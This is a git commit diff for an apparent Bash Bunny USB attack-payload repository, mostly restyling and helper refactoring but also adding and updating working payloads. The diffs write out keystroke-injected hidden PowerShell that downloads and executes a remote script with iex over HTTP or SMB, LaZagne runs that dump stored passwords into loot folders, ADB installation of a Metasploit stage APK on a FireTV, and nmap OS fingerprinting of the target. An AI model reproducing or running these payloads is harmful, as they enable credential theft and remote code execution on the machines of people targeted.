Update and fix payloads (#277)

* Updated all Payloads for Version 1.2+

Fixed Style Issues on extensions and payloads.
Added GET TARGET_OS to get.sh
Removed and Fixed all uses ducky_helper.sh (Issue #248)
Removed all mention of DUCKY_LANG (Issue #248)
Renamed Payloads with spaces in name
Added an extension to keep Macs Happy
Added a payload for Mac DNS poisoning
Fixed Issue #271 changed wget to curl -o
Implemented PR #268
Implemented PR #273

* Fixed e.cmd

* Fix e.cmd pt2

* Fixed Issues

Fixed issues pointed out by @sebkinne
Fixed styling errors

payloads/extensions/cucumber.sh

@@ -1,25 +1,25 @@
 #!/bin/bash
 
 function CUCUMBER() {
-	case $1 in
-		"ENABLE")
-			echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
-			echo 0 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
-			;;
-		"DISABLE")
-			echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
-			sleep 2
-			echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
-			;;
-		"PLAID")
-			echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
-			sleep 2
-			echo performance | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
-			;;
-		*)
-			LED FAIL
-			exit 1
-	esac
+  case $1 in
+    "ENABLE")
+      echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
+      echo 0 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
+      ;;
+    "DISABLE")
+      echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
+      sleep 2
+      echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
+      ;;
+    "PLAID")
+      echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
+      sleep 2
+      echo performance | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
+      ;;
+    *)
+      LED FAIL
+      exit 1
+  esac
 }
 
 export -f CUCUMBER

payloads/extensions/ducky_lang.sh

@@ -1,8 +1,8 @@
 #!/bin/bash
 
 function DUCKY_LANG() {
-	[[ -z "$1" ]] && exit 1 # parameter must be set
+  [[ -z "$1" ]] && exit 1 # parameter must be set
 
-	export DUCKY_LANG="$1"
+  export DUCKY_LANG="$1"
 }
 export -f DUCKY_LANG

payloads/extensions/get.sh

@@ -1,23 +1,31 @@
 #!/bin/bash
 
 function GET() {
-	case $1 in
-		"TARGET_IP")
-			export TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
-			;;
-		"TARGET_HOSTNAME")
-			export TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')
-			;;
-		"HOST_IP")
-			export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})
-			;;
-		"SWITCH_POSITION")
-			[[ "$(cat /sys/class/gpio_sw/PA8/data)" == "0" ]] && export SWITCH_POSITION="switch1" && return
-			[[ "$(cat /sys/class/gpio_sw/PL4/data)" == "0" ]] && export SWITCH_POSITION="switch2" && return
-			[[ "$(cat /sys/class/gpio_sw/PL3/data)" == "0" ]] && export SWITCH_POSITION="switch3" && return
-			export SWITCH_POSITION="invalid"
-			;;
-	esac
+  case $1 in
+    "TARGET_IP")
+      export TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
+      ;;
+    "TARGET_HOSTNAME")
+      export TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')
+      ;;
+    "HOST_IP")
+      export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})
+      ;;
+    "SWITCH_POSITION")
+      [[ "$(cat /sys/class/gpio_sw/PA8/data)" == "0" ]] && export SWITCH_POSITION="switch1" && return
+      [[ "$(cat /sys/class/gpio_sw/PL4/data)" == "0" ]] && export SWITCH_POSITION="switch2" && return
+      [[ "$(cat /sys/class/gpio_sw/PL3/data)" == "0" ]] && export SWITCH_POSITION="switch3" && return
+      export SWITCH_POSITION="invalid"
+      ;;
+    "TARGET_OS")
+      ScanForOS=$(nmap -Pn -O $TARGET_IP -p1)
+      [[ $ScanForOS == *"Too many fingerprints"* ]] && ScanForOS=$(nmap -Pn -O --osscan-guess $TARGET_IP)
+      [[ $ScanForOS == *"Windows"* ]] && OSfound='WINDOWS' && return
+      [[ $ScanForOS == *"Linux"* ]] && OSfound='LINUX' && return
+      [[ $ScanForOS == *"Apple"* ]] && OSfound='MACOS' && return
+      export TARGET_OS='UNKNOWN'
+      ;;
+  esac
 }
 
 export -f GET

payloads/extensions/mac_happy.sh

@@ -0,0 +1,26 @@
+#!/bin/bash
+
+#Title:     Mac_Happy
+# Author:    thehappydinoa
+# Target:    Mac
+# Version:   0.1
+#
+# Makes Mac happy by correctly setting pid and vid
+# Use by running mac_happy ATTACKMODE HID <attack modes here>
+#
+
+function mac_happy() {
+    [[ -z "$1" ]] && exit 1 # parameter must be set
+
+    [[ ! $1 =~ "ATTACKMODE" ]] && exit 1 # parameter must be for ATTACKMODE
+
+    for i in $*;
+    do
+        command=$(echo $command $i)
+    done
+
+    command=$(echo $command VID_0X05AC PID_0X021E)
+
+    eval $command
+}
+export -f mac_happy

payloads/extensions/requiretool.sh

@@ -8,11 +8,11 @@
 # REQUIRETOOL impacket
 
 function REQUIRETOOL() {
-	[[ -z "$1" ]] && exit 1 # parameter must be set
+  [[ -z "$1" ]] && exit 1 # parameter must be set
 
-	if [ ! -d /tools/$1/ ]; then
-	  LED FAIL
-	  exit 1
-	fi
+  if [ ! -d /tools/$1/ ]; then
+    LED FAIL
+    exit 1
+  fi
 }
 export -f REQUIRETOOL

payloads/extensions/run.sh

@@ -37,6 +37,13 @@ function RUN() {
          QUACK DELAY 500
          QUACK ENTER
          ;;
+      LINUX)
+         QUACK ALT F2
+         QUACK DELAY 500
+         QUACK STRING "$@"
+         QUACK DELAY 500
+         QUACK ENTER
+         ;;
       *)
          # OS parameter must be one of the above
          exit 1

payloads/extensions/setkb.sh

@@ -11,41 +11,41 @@
 
 
 function SETKB() {
-   local state=$1
-   shift
+  local state=$1
+  shift
 
-   [[ -z "$state" ]] && exit 1 # state keyboard parameter must be given.
+  [[ -z "$state" ]] && exit 1 # state keyboard parameter must be given.
 
-   case "$state" in
-      'START')
-         QUACK GUI r
-         QUACK DELAY 500
-         QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force;"
-         QUACK ENTER
-         QUACK DELAY 1500
+  case "$state" in
+    'START')
+      QUACK GUI r
+      QUACK DELAY 500
+      QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force;"
+      QUACK ENTER
+      QUACK DELAY 1500
 
-         ;;
-      'DONE')
-         QUACK GUI r
-         QUACK DELAY 500
-         QUACK "STRING powershell.exe \$sl=(Get-WinSystemLocale | Select -ExpandProperty Name) ; Set-WinUserLanguageList -LanguageList \$sl -force; "
-         QUACK ENTER
-         QUACK DELAY 1500
+      ;;
+    'DONE')
+      QUACK GUI r
+      QUACK DELAY 500
+      QUACK "STRING powershell.exe \$sl=(Get-WinSystemLocale | Select -ExpandProperty Name) ; Set-WinUserLanguageList -LanguageList \$sl -force; "
+      QUACK ENTER
+      QUACK DELAY 1500
 
-         ;;    
+      ;;
 
-      *)
-         QUACK GUI r
-         QUACK DELAY 500
-         QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $state -force"
-         QUACK ENTER
-         QUACK DELAY 1500
+    *)
+      QUACK GUI r
+      QUACK DELAY 500
+      QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $state -force"
+      QUACK ENTER
+      QUACK DELAY 1500
 
-         ;;    
+      ;;
 
 
 
-   esac
+  esac
 }
 
 export -f SETKB

payloads/library/Incident_Response/Hidden_Images/payload.txt

@@ -1,12 +1,7 @@
-
-
-
-LED R B 100
+LED SETUP
+GET SWITCH_POSITION
 ATTACKMODE HID STORAGE
 
-
-DUCKY_LANG gb
-LED B
-RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
-LED G FAST
-#Green means good to go
+LED SETUP
+RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')"
+LED ATTACK

payloads/library/Incident_Response/Link_File_analysis/payload.txt

@@ -0,0 +1,7 @@
+LED SETUP
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+LED SETUP
+RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')"
+LED ATTACk

payloads/library/android/fireytv/payload.txt

@@ -11,8 +11,13 @@
 # Blue Blinking ...............Running ADB command to push payload.apk
 # Red Blinking.......FireTV failed to get an IP address from the Bash Bunny
 # Green..............Finished
+
+LED SETUP
+GET TARGET_IP
+GET SWITCH_POSITION
+
 ATTACKMODE HID
-LED R B 0
+LED ATTACK
 Q RIGHTARROW
 Q DELAY 200
 Q RIGHTARROW
@@ -64,12 +69,11 @@ Q DELAY 200
 Q ESCAPE
 ATTACKMODE ECM_ETHERNET
 LED B 2000
-source bunny_helpers.sh
 if [ -z "${TARGET_IP}" ]; then
-    LED R 2000
+    LED FAIL
 	exit 1
 fi
 adb connect ${TARGET_IP}
 adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
 adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
-LED G
+LED FINISH

payloads/library/credentials/BruteBunny/payload.txt

@@ -10,10 +10,9 @@
 #                access to the admin panel.
 
 # init
-LED R B
+LED SETUP
 
-# need SWITCH_POSITION, so give it to me. please. thank you.
-source bunny_helpers.sh
+GET SWITCH_POSITION
 
 # set up the things to make it do stuff
 mkdir -p /root/udisk/BruteBunny/loot
@@ -28,12 +27,12 @@ sync;sleep 1;sync
 ATTACKMODE HID STORAGE
 
 # wait for storage
-LED R G B 100
+LED STAGE1
 QUACK DELAY 6000
 QUACK GUI r
 QUACK DELAY 100
 # unleash the brute bunny
-LED B 100
+LED STAGE2
 QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\brutebunny.ps1')"
 QUACK ENTER
 sleep 10
@@ -41,4 +40,4 @@ sleep 10
 # sync the stuff
 sync;sleep 1;sync
 
-LED G
+LED FINISH

payloads/library/credentials/DumpCreds/payload.txt

@@ -30,6 +30,7 @@ logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #
 ###### Lets Start ####
 LED SETUP
 
+GET SWITCH_POSITION
 
 # Some Variables
 SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
@@ -109,7 +110,6 @@ logger -t DumpCred_2.1 "### Enter Ethernet Stage ###"
 # Ethernet Tage
 LED STAGE3
 ATTACKMODE RNDIS_ETHERNET
-# Source bunny_helpers.sh to get environment variables
 
 logger -t DumpCred_2.1 "### Start SMBServer ###"
 # Start SMB Server

payloads/library/credentials/MrRobot/payload.txt

@@ -14,7 +14,10 @@
 # Cyan inverted double blink..Starts server to gets results
 # Green..............Got Creds and copied to loot folder
 # Red................No Creds
+
 LED SETUP
+GET SWITCH_POSITION
+
 # Creating Loot Folders
 LOOTDIR=/root/udisk/loot/MrRobot
 mkdir -p $LOOTDIR

payloads/library/credentials/PasswordGrabber/e.cmd

@@ -11,7 +11,7 @@ REM This executes LaZagne in the current directory and outputs the password file
 REM Time and Date is also added
 setlocal
 cd /d %~dp0
-%~dp0\laZagne.exe all > "%~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
+%~dp0\laZagne.exe all -vV > "%~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
 
 REM These lines if you just want Passwords and no files.
 set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%

payloads/library/credentials/PasswordGrabber/payload.txt

@@ -11,7 +11,8 @@
 # which in turn executes e.cmd invisibly using i.vbs
 # which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny.
 #
-
+LED SETUP
+GET SWITCH_POSITION
 LED ATTACK
 ATTACKMODE HID STORAGE
 RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"

payloads/library/credentials/SudoBackdoor/cleaner/payload.txt

@@ -24,8 +24,6 @@ else
     ATTACKMODE ECM_ETHERNET HID
 fi
 
-DUCKY_LANG us
-
 GET SWITCH_POSITION
 GET HOST_IP
 

payloads/library/credentials/SudoBackdoor/injector/payload.txt

@@ -26,8 +26,6 @@ else
     ATTACKMODE ECM_ETHERNET HID
 fi
 
-DUCKY_LANG us
-
 GET SWITCH_POSITION
 GET HOST_IP
 

payloads/library/credentials/WifiGrabber/payload.txt

@@ -22,17 +22,15 @@
 
 ATTACKMODE HID STORAGE
 
-LED R B 200
+LED SETUP
 
-LANGUAGE=‘us’
-
-source bunny_helpers.sh
+GET SWITCH_POSITION
 
 if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
         QUACK ${SWITCH_POSITION}/ducky_script.txt
-        LED G
+        LED FINISH
 else
-    LED R
+    LED FAIL
     echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
         exit 1
 fi

payloads/library/execution/exe_UACBypassD&E/payload.txt

@@ -16,7 +16,10 @@
 DRIVER_LABEL='BashBunny'
 
 #RED means starting
-LED R
+LED SETUP
+
+#Gets File locations
+GET SWITCH_POSITION
 
 #We are a keyboard
 ATTACKMODE HID STORAGE
@@ -32,4 +35,3 @@ LED G
 #If you would like to bash bunny to shutdown/exit/dismount from the target system after execution, you can uncomment the lines below
 #QUACK DELAY 4500
 #shutdown 0
-

payloads/library/execution/psh_DownloadExec/payload.txt

@@ -8,51 +8,49 @@
 # Attackmodes:   HID, RNDIS_ETHERNET
 # Firmware:      >= 1.3
 #
-# Quick HID attack to retrieve and run powershell payload from BashBunny web server - ensure psh.txt exists in payload directory
+# Quick HID attack to retrieve and run powershell payload from BashBunny web server
+# ensure p.txt (your powershell payload) exists in payload directory
 #
 # | Attack Stage        | Description                              |
 # | ------------------- | ---------------------------------------- |
 # | Stage 1             | Running Initial Powershell Commands      |
-# | Stage 3             | Delivering powershell payload            |
+# | Stage 2             | Delivering powershell payload            |
 #
 
 ATTACKMODE RNDIS_ETHERNET HID
 LED SETUP
+REQUIRETOOL gohttp
 
 GET HOST_IP
 GET SWITCH_POSITION
 
-# Set working dir
-PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
-SERVER_LOG=$PAYLOAD_DIR/server.log
+# DEFINE DIRECTORIES
+PAYLOAD_DIR=/root/udisk/payloads/${SWITCH_POSITION}
+SERVER_LOG=/tmp/server.log
 
-# Fresh Server Log
-rm -f $SERVER_LOG
+# SERVER LOG
+rm -f ${SERVER_LOG}
 
-# Check for gohttp
-REQUIRETOOL gohttp
-
-# Start web server
+# START HTTP SERVER
 iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
-/usr/bin/gohttp -p 80 -d $PAYLOAD_DIR  > $SERVER_LOG 2>&1 &
+/tools/gohttp/gohttp -p 80 -d /tmp/ > ${SERVER_LOG} 2>&1 &
 
-# Check for psh.txt
-if [ ! -f $PAYLOAD_DIR/psh.txt ]; then
+# CHECK FOR POWERSHELL
+if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
     LED FAIL2
     exit 1
 fi
+cp -R ${PAYLOAD_DIR}/* /tmp/ # any additional assets will be available in tmp
 
-# Attack HID
+# STAGE 1 - POWERSHELL
 LED STAGE1
 
-# Attack (abbreviations to allow run execution)
-RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('$HOST_IP','80')).Connected) {iex \$web.DownloadString('http://$HOST_IP/psh.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
+RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('${HOST_IP}','80')).Connected) {iex \$web.DownloadString('http://${HOST_IP}/p.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
 # Remove tracks in the psh payload if you wish
 
-# Attack Ethernet
+# STAGE 2 - WAIT
 LED STAGE2
-
-while ! grep -Fq "GET \"/DONE\"" $SERVER_LOG; do
+while ! grep -Fq "GET \"/DONE\"" ${SERVER_LOG}; do
     sleep .5
 done
 

payloads/library/execution/psh_DownloadExec/readme.md

@@ -14,7 +14,7 @@ Quick HID attack to retrieve and run powershell payload from BashBunny web serve
 
 ## Configuration
 
-Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
+Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
 
 ## Requirements
 
@@ -31,5 +31,5 @@ See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info
 | Attack Stage        | Description                              |
 | ------------------- | ---------------------------------------- |
 | Stage 1             | Running Initial Powershell Commands      |
-| Stage 3             | Delivering powershell payload            |
+| Stage 2             | Delivering powershell payload            |
 ```

payloads/library/execution/psh_DownloadExecSMB/p.txt

@@ -1,3 +1,2 @@
 New-Item $ENV:UserProfile\Desktop\SUCCESS -ItemType file
 Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
-

payloads/library/execution/psh_DownloadExecSMB/payload.txt

@@ -2,23 +2,23 @@
 #
 # Title:         Powershell Download and Execute SMB
 # Author:        LowValueTarget
-# Version:       1.2
+# Version:       2.0
 # Category:      Powershell
 # Target:        Windows XP SP3+ (Powershell)
 # Attackmodes:   HID, RNDIS_ETHERNET
 # Firmware:      >= 1.2
 #
-# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.  
-# Ensure psh.txt exists in payload directory  
+# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless!
+# Credentials captured by  are stored as loot.
+# Ensure p.txt exists in payload directory  (using .txt instead of .ps1 in case of security countermeasures)
 #
-# Requires Impacket is installed (python ./impacket/setup.py install)  
+# Required tools: impacket
 #
 # | Attack Stage        | Description                   |
 # | ------------------- | ------------------------------|
 # | Stage 1             | Powershell                    |
 # | Stage 2             | Delivering powershell payload |
 #
-
 ATTACKMODE RNDIS_ETHERNET HID
 
 # SETUP
@@ -29,48 +29,48 @@ GET SWITCH_POSITION
 GET TARGET_HOSTNAME
 GET HOST_IP
 
+# DEFINE DIRECTORIES
 PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
-# Check for psh.txt
-if [ ! -f ${PAYLOAD_DIR}/psh.txt ]; then
+LOOTDIR_BB=/root/udisk/loot/psh_DownloadExecSMB
+
+mkdir -p /tmp/{l,p}
+
+# CHECK FOR POWERSHELL
+if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
     LED FAIL
     exit 1
 fi
-cp -R ${PAYLOAD_DIR}/* /tmp/
+cp -R ${PAYLOAD_DIR}/* /tmp/p/ # any additional assets will be available in tmp
 
-LOOTDIR=/root/udisk/loot/psh_DownloadExecSMB
-# Setup named logs in loot directory
-mkdir -p ${LOOTDIR}
+# GET HOSTNAME
 HOST=${TARGET_HOSTNAME}
-# If hostname is blank set it to "noname"
-[[ -z "$HOST" ]] && HOST="noname"
-COUNT=$(ls -lad ${LOOTDIR}/$HOST* | wc -l)
+[[ -z "${HOST}" ]] && HOST="noname"
+COUNT=$(ls -lad ${LOOTDIR_BB}/${HOST}* | wc -l)
 COUNT=$((COUNT+1))
-mkdir -p ${LOOTDIR}/${HOST}-$COUNT
+mkdir -p ${LOOTDIR_BB}/${HOST}-${COUNT}
+LOOTDIR_BB=${LOOTDIR_BB}/${HOST}-${COUNT}
 
-# Log file
-LOGFILE=psh_smb.log
+# START SMB SERVER
+LOGFILE=/tmp/l/psh_downloadsmb.log
+touch ${LOGFILE}
+python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp > ${LOGFILE} &
 
-# Start SMB Server
-mkdir -p /loot
-python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp/ > /loot/${LOGFILE} &
-
-# STAGE 1 - Powershell
+# STAGE 1 - POWERSHELL
 LED STAGE1
+RUN WIN "powershell -WindowStyle Hidden \"while (\$true) {If ((New-Object net.sockets.tcpclient(${HOST_IP},445)).Connected) {iex (New-Object Net.WebClient).DownloadString('\\\\${HOST_IP}\\s\\p\\p.txt');New-Item \\\\${HOST_IP}\\s\\COMPLETE -ItemType file;exit}}\""
+# TIP: To exfil any data, upload to \\172.16.64.1\s\l\ -- this will be copied to the BB as loot
+# TIP: Remove tracks in the psh payload if you wish
 
-RUN WIN "powershell -WindowStyle Hidden \"while (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { iex (New-Object Net.WebClient).DownloadString('\\\\$HOST_IP\\s\\psh.txt');New-Item \\\172.16.64.1\\s\\COMPLETE -ItemType file;exit}}\""
-# Remove tracks in the psh payload if you wish
-
-# STAGE 2 - Wait until payload retrieved
-# Wait until payload is retrieved
+# STAGE 2 - HURRY UP AND WAIT
 LED STAGE2
 while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done
 
 # CLEANUP
 LED CLEANUP
 
-# Move loot to mass storage
-mv /loot/${LOGFILE} ${LOOTDIR}/${HOST}-$COUNT
-rm /loot/${LOGFILE}
+# STASH THE LOOT
+mv /tmp/l/* ${LOOTDIR_BB}/
+rm -rf /tmp/{l,p}
 # Sync file system
 sync
 

payloads/library/execution/psh_DownloadExecSMB/readme.md

@@ -10,12 +10,16 @@
 
 ## Description
 
-Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.  
+Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. SMB Credentials are stored as loot.  
 
 ## Configuration
 
-* Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.  
-* Requires Impacket is installed (python ./impacket/setup.py install)  
+* Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.  
+* Requires Impacket
+
+__Installation__
+
+See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info-tools/
 
 ## STATUS
 

payloads/library/exfiltration/BlackBackup/payload.txt

@@ -14,19 +14,18 @@
 # OPTIONS - More options available in the Powershell payload
 OBFUSCATECMD="N" # Y=yes or N=no
 
-# Source bunny_helpers.sh to get environment variable and switch_positions
-source bunny_helpers.sh
-
 #-----------------------------------
 # Purple LED - initializing
-LED R B 0
+LED SETUP
+
+GET SWITCH_POSITION
 
 # Attackmode HID / Storage
 ATTACKMODE HID STORAGE
 
 #-----------------------------------
 # Green LED - executing credential_powershell
-LED G 0
+LED STAGE1
 
 QUACK GUI r
 QUACK DELAY 300
@@ -57,4 +56,4 @@ QUACK ENTER
 
 #-----------------------------------
 # Kill the lights - finished
-LED 0
+LED FINISH

payloads/library/exfiltration/FileInfoExfil/payload.txt

@@ -15,26 +15,17 @@
 #	NOTE: p.ps1 MUST be in loot/payloads/ for this to work.
 #
 
-LED B R
+LED SETUP
+
+GET SWITCH_POSITION
 
 ATTACKMODE HID STORAGE
 
-
-
-# Set language
-QUACK SET_LANGUAGE gb
-
-
-# Source bunny_helpers.sh to allow the value fo SWITCH_POSITION to be returned
-source bunny_helpers.sh
-
-
-
 if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
 
 
 #Call ducky script
-LED R G
+LED STAGE1
 
 
 QUACK ${SWITCH_POSITION}/ducky_script.txt
@@ -42,12 +33,12 @@ QUACK ${SWITCH_POSITION}/ducky_script.txt
 
 QUACK DELAY 10000
 
-LED R G B
+LED FINISH
 
 else
 
 
-LED R
+LED FAIL
 
 
 #Red LED if unable to load script

payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt

@@ -8,14 +8,14 @@
 # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
 # which in turn runs powershell script to copy move and extract data.
 
-# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
-source bunny_helpers.sh
+LED SETUP
+
+GET SWITCH_POSITION
 
-LED R 100
 ATTACKMODE HID STORAGE
 QUACK GUI r
 QUACK DELAY 100
-LED R B 100
+LED ATTACK
 QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
 QUACK ENTER
-LED R G B
+LED FINISH

payloads/library/exfiltration/ftp_exfiltrator/payload.txt

@@ -15,13 +15,12 @@
 #Red............Failed - Need to work on
 #Green..........Finished
 
-# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
-source bunny_helpers.sh
-
-LED R B
+LED SETUP
+GET SWITCH_POSITION
 ATTACKMODE HID STORAGE
 QUACK GUI r
 QUACK DELAY 1000
+LED ATTACK
 QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"
 QUACK ENTER
-LED G
+LED FINISH

payloads/library/exfiltration/usb_exfiltrator/e.cmd

@@ -6,6 +6,14 @@ REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
 
 REM Creates directory compromised of computer name, date and time
 REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
+
+REM This executes LaZagne in the current directory and outputs the password file to Loot
+REM Time and Date is also added
+setlocal
+cd /d %~dp0
+%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
+
+REM These lines if you just want Passwords and no files.
 set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
 mkdir %dst% >>nul
 
@@ -19,7 +27,8 @@ REM /E Copies directories and subdirectories, including empty ones.
 REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
 
 REM Same as above but does not create empty directories
-xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
+REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
+
 )
 
 REM Blink CAPSLOCK key

payloads/library/exfiltration/usb_exfiltrator/payload.txt

@@ -11,7 +11,7 @@
 # which in turn executes e.cmd invisibly using i.vbs
 # which in turn copies documents to the loot folder on the Bash Bunny.
 #
-
+GET SWITCH_POSITION
 LED ATTACK
 ATTACKMODE HID STORAGE
 RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"

payloads/library/general/ExecutableInstaller/payload.txt

@@ -11,15 +11,12 @@
 # using the --startup parameter. Change these settings inside of e.cmd.
 #
 
-# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
-source bunny_helpers.sh
-
-LED R
+LED SETUP
+GET SWITCH_POSITION
+LED ATTACK
 ATTACKMODE HID STORAGE
 QUACK GUI r
 QUACK DELAY 100
 QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
 QUACK ENTER
-
-# Green LED for finished
-LED G
+LED FINISH

payloads/library/general/Proxy_Interceptor/payload.txt

@@ -19,9 +19,11 @@ LED R 50
 #Set ATTACKMODE to HID and Storage to be able to transfer the certificate
 ATTACKMODE HID STORAGE
 
-#Import Bunny Helpers
-source bunny_helpers.sh
 
+LED SETUP
+GET SWITCH_POSITION
+
+LED ATTACK
 #Start of Script
 Q DELAY 6000
 Q GUI r
@@ -39,6 +41,7 @@ Q STRING cd \$absPath
 Q ENTER
 Q DELAY 500
 
+LED ATTACK
 #Set the proxy in the internet settings in the registry (For IE and Chrome).
 Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\SetProxy.ps1')"
 Q ENTER
@@ -62,4 +65,4 @@ Q DELAY 500
 Q STRING EXIT
 Q ENTER
 sync
-LED R B 100
+LED FINISH

payloads/library/general/Windows_NIC_Sharing/payload.txt

@@ -34,9 +34,11 @@
 # Set the IPv4=172.16.64.64 and Subnet=24-bit
 # Hit all the OKs
 
+GET SWITCH_POSITION
+
 # Or we could just have the Bash Bunny do all the work...
 LED SETUP
-SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
+SWITCHDIR=/root/udisk/payloads/$(SWITCH_POSITION)
 
 # HID Attack Starts
 ATTACKMODE HID

payloads/library/phishing/dns_poisoning_mac/README.md

@@ -0,0 +1,9 @@
